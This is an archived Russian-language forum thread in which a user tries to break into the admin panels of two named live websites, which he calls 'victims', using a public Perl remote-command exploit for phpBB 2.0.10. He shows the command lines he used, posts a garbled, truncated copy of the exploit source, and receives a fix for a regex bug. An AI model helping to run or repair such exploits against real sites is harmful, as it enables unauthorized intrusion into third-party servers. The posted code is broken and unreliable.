PDA

Просмотр полной версии : phpBB 2.0.10 EXPLOIT


nodead1
26.12.2010, 02:10
Вот такая проблема:

http://s004.radikal.ru/i206/1012/36/d02370ab1463.png

Решил получить доступ к админке читал читал ну и решил скачать эксплоит. эксплоид я создал сначало в текстовом редакторе (txt) потом через него сохранил эксплоит в .pl в UTF-8

не знаю правильно я сделал или нет тк как делать правельно я не знаю.... ( =l)

-------------------------------------

http://thebestkill.no-ip.biz/ Жертва

http://91.146.44.8/ Жертва

-------------------------------------

потом скачал perl указал все вроде правельно а у меня ошибка

Perl phpBB2010.pl http://thebestkill.no-ip.org /forum/ 12 ls

perl - мой перл

phpBB2010.pl - мой эксплоид

http://thebestkill.no-ip.org - жертва

/forum/ - деректория

12 - топик

ls - хз

также пытался через

Perl phpBB2010.pl http://91.146.44.8 /forum/ 12 ls

тоже неудача

возможно это потому что я создал не правельно эксплоид?

547
26.12.2010, 11:55
nodead1 said:
Вот такая проблема:
http://s004.radikal.ru/i206/1012/36/d02370ab1463.png
Решил получить доступ к админке читал читал ну и решил скачать эксплоит. эксплоид я создал сначало в текстовом редакторе (txt) потом через него сохранил эксплоит в .pl в UTF-8
не знаю правильно я сделал или нет тк как делать правельно я не знаю.... (
=l
)
-------------------------------------
http://thebestkill.no-ip.biz/ Жертва
http://91.146.44.8/ Жертва
-------------------------------------
потом скачал perl указал все вроде правельно а у меня ошибка
Perl
phpBB2010.pl
http://thebestkill.no-ip.org
/forum/
12
ls
perl
- мой перл
phpBB2010.pl
- мой эксплоид
http://thebestkill.no-ip.org
- жертва
/forum/
- деректория
12
- топик
ls
- хз
также пытался через
Perl phpBB2010.pl http://91.146.44.8 /forum/ 12 ls
тоже неудача
возможно это потому что я создал не правельно эксплоид?


кинь исходник сплоита!

а вообще я так слегка подозреваю что этот-->

phpBB

nodead1
26.12.2010, 12:16
Code:
3#!/usr/bin/perl

use IO::Socket;

## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = )
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

# milw0rm.com [2004-11-22]

547
26.12.2010, 12:19
http://thebestkill.no-ip.org лежит твоя жертва) нет возможности проверить...

nodead1
26.12.2010, 19:41
сейчас попробуй

как я понял не лежит только вечером

nodead1
26.12.2010, 22:09
up/////

winstrool
01.03.2011, 22:54
в твоем сплоите в 107 ошибка в ней прописано "$serv =~ s/(http://)//eg;" а должно быть "$serv =~ s/(http:\/\/)//eg; " после этой замены все робит

DCrypt
01.03.2011, 23:06
Анти скрипткиддис.